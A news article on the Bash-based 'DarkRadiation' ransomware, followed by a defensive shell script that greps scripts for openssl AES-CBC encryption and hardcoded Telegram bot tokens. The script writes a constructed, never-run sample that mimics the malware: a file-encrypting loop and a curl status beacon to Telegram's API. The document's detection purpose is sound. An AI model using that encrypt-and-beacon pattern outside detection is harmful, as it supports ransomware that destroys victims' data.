Cybersecurity researchers are sounding the alarm bell over a new ransomware strain called “DarkRadiation” that’s implemented entirely in Bash and targets Linux and Docker cloud containers, while banking on messaging service Telegram for command-and-control (C2) communications.
“The ransomware is written in Bash script and targets Red Hat/CentOS and Debian Linux distributions,” researchers from Trend Micro said in a report published last week. “The malware uses OpenSSL’s AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram’s API to send an infection status to the threat actor(s).”
As of writing, there’s no information available on the delivery methods or evidence that the ransomware has been deployed in real-world attacks.
The findings come from an analysis of a collection of hacking tools hosted on the unidentified threat actor’s infrastructure (IP address “220.127.116.11”) in a directory called “api_attack.” The toolset was first noticed by Twitter user @r3dbU7z on May 28.
DarkRadiation’s infection chain is a multi-stage process and is noteworthy for its extensive reliance on Bash scripts, used both to retrieve the malware and to encrypt files, and on the Telegram API, accessed with hardcoded API keys, to communicate with the C2 server.
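The two behaviours the report describes, `openssl enc` with an AES-CBC cipher and a Telegram Bot API call driven by a hardcoded token, are easy to hunt for in shell scripts on a Linux host or in a container image. The script below is an added example written for this article, not DarkRadiation's code and not from Trend Micro's report; the two sample scripts it scans are constructed, the placeholder token is fake, and the 30-character lower bound on the token secret is an assumption chosen to avoid matching ordinary `key:value` strings.

```shell
#!/bin/sh
# Hunting heuristic for two behaviours reported for DarkRadiation: a shell
# script that (1) runs `openssl enc` with an AES-CBC cipher and (2) embeds a
# Telegram bot token used in a Bot API URL. Added example, not the malware's
# code; the samples written by make_samples are constructed and never run.

# Telegram bot tokens look like <numeric bot id>:<secret>, and the Bot API URL
# is https://api.telegram.org/bot<token>/<method>. The 30+ length bound on the
# secret is an assumption to cut false positives on ordinary "key:value" text.
TG_TOKEN_RE='[0-9]{8,10}:[A-Za-z0-9_-]{30,}'
TG_API_RE='api\.telegram\.org/bot'
OPENSSL_CBC_RE='openssl[[:space:]]+enc[[:space:]].*-aes-[0-9]+-cbc'

# Print "<score> <indicator...>" for one file; each indicator adds one point.
score_script() {
  local f score hits
  f="$1"; score=0; hits=""
  if grep -Eq "$OPENSSL_CBC_RE" "$f"; then
    score=$((score + 1)); hits="${hits}openssl-aes-cbc "
  fi
  # Require both the API host and a token literal, so a script that merely
  # mentions Telegram in a comment does not count.
  if grep -Eq "$TG_API_RE" "$f" && grep -Eq "$TG_TOKEN_RE" "$f"; then
    score=$((score + 1)); hits="${hits}telegram-bot-token "
  fi
  printf '%s%s\n' "$score" "${hits:+ ${hits% }}"
}

# Pull hardcoded tokens out of one or more files (deduplicated) so they can
# be blocked at the proxy or reported to Telegram for revocation.
extract_tokens() {
  grep -Eoh "$TG_TOKEN_RE" "$@" | sort -u
}

# List the scripts in a directory that show both behaviours (score 2).
hunt_dir() {
  local f
  for f in "$1"/*.sh; do
    [ -f "$f" ] || continue
    case "$(score_script "$f")" in
      "2 "*) echo "${f##*/}" ;;
    esac
  done
}

# Constructed samples: one mimics the reported pattern (placeholder token,
# never executed), one is a benign backup script. Prints the directory.
make_samples() {
  local dir
  dir=$(mktemp -d)
  cat > "$dir/suspect.sh" <<'EOF'
#!/bin/bash
# constructed sample for the hunt above; placeholder token; never run
TOKEN="123456789:AAExampleTokenPlaceholder000000000000"
CHAT_ID="987654321"
for f in "$HOME/demo"/*; do
  openssl enc -aes-256-cbc -salt -in "$f" -out "$f.enc" -pass pass:changeme
done
curl -s "https://api.telegram.org/bot${TOKEN}/sendMessage?chat_id=${CHAT_ID}&text=encrypted"
EOF
  cat > "$dir/benign.sh" <<'EOF'
#!/bin/bash
tar czf /var/backups/etc.tgz /etc
EOF
  echo "$dir"
}

samples=$(make_samples)
echo "flagged: $(hunt_dir "$samples")"
echo "tokens:  $(extract_tokens "$samples"/*.sh)"
rm -rf "$samples"
```

Run it against a directory of scripts pulled from a suspect host or an unpacked container layer; anything scoring 2 deserves a manual look, and any token `extract_tokens` recovers is an indicator to block outbound and hand to the incident record.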